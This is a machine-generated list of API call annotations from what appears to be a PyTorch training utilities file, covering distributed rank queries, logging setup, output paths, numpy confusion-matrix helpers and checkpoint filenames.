[((1003, 1037), 'torch.distributed.get_world_size', 'torch.distributed.get_world_size', ([], {}), '()\n', (1035, 1037), False, 'import torch\n'), ((1131, 1159), 'torch.distributed.get_rank', 'torch.distributed.get_rank', ([], {}), '()\n', (1157, 1159), False, 'import torch\n'), ((2058, 2078), 'pathlib.Path', 'Path', (['cfg.OUTPUT_DIR'], {}), '(cfg.OUTPUT_DIR)\n', (2062, 2078), False, 'from pathlib import Path\n'), ((2529, 2560), 'time.strftime', 'time.strftime', (['"""%Y-%m-%d-%H-%M"""'], {}), "('%Y-%m-%d-%H-%M')\n", (2542, 2560), False, 'import time\n'), ((2794, 2813), 'logging.getLogger', 'logging.getLogger', ([], {}), '()\n', (2811, 2813), False, 'import logging\n'), ((2862, 2885), 'logging.StreamHandler', 'logging.StreamHandler', ([], {}), '()\n', (2883, 2885), False, 'import logging\n'), ((4946, 4964), 'numpy.bincount', 'np.bincount', (['index'], {}), '(index)\n', (4957, 4964), True, 'import numpy as np\n'), ((4988, 5020), 'numpy.zeros', 'np.zeros', (['(num_class, num_class)'], {}), '((num_class, num_class))\n', (4996, 5020), True, 'import numpy as np\n'), ((9070, 9112), 'torch.arange', 'torch.arange', (['(0)', 'maxlen'], {'dtype': 'torch.int64'}), '(0, maxlen, dtype=torch.int64)\n', (9082, 9112), False, 'import torch\n'), ((939, 973), 'torch.distributed.is_initialized', 'torch.distributed.is_initialized', ([], {}), '()\n', (971, 973), False, 'import torch\n'), ((1067, 1101), 'torch.distributed.is_initialized', 'torch.distributed.is_initialized', ([], {}), '()\n', (1099, 1101), False, 'import torch\n'), ((4239, 4273), 'os.path.join', 'os.path.join', (['output_dir', 'filename'], {}), '(output_dir, filename)\n', (4251, 4273), False, 'import os\n'), ((4629, 4654), 'numpy.argmax', 'np.argmax', (['output'], {'axis': '(3)'}), '(output, axis=3)\n', (4638, 4654), True, 'import numpy as np\n'), ((2890, 2911), 'logging.getLogger', 'logging.getLogger', (['""""""'], {}), "('')\n", (2907, 2911), False, 'import logging\n'), ((4359, 4405), 'os.path.join', 'os.path.join', (['output_dir', '"""model_best.pth.tar"""'], {}), "(output_dir, 'model_best.pth.tar')\n", (4371, 4405), False, 'import os\n'), ((2301, 2327), 'os.path.basename', 'os.path.basename', (['cfg_name'], {}), '(cfg_name)\n', (2317, 2327), False, 'import os\n'), ((2959, 2976), 'pathlib.Path', 'Path', (['cfg.LOG_DIR'], {}), '(cfg.LOG_DIR)\n', (2963, 2976), False, 'from pathlib import Path\n')]
|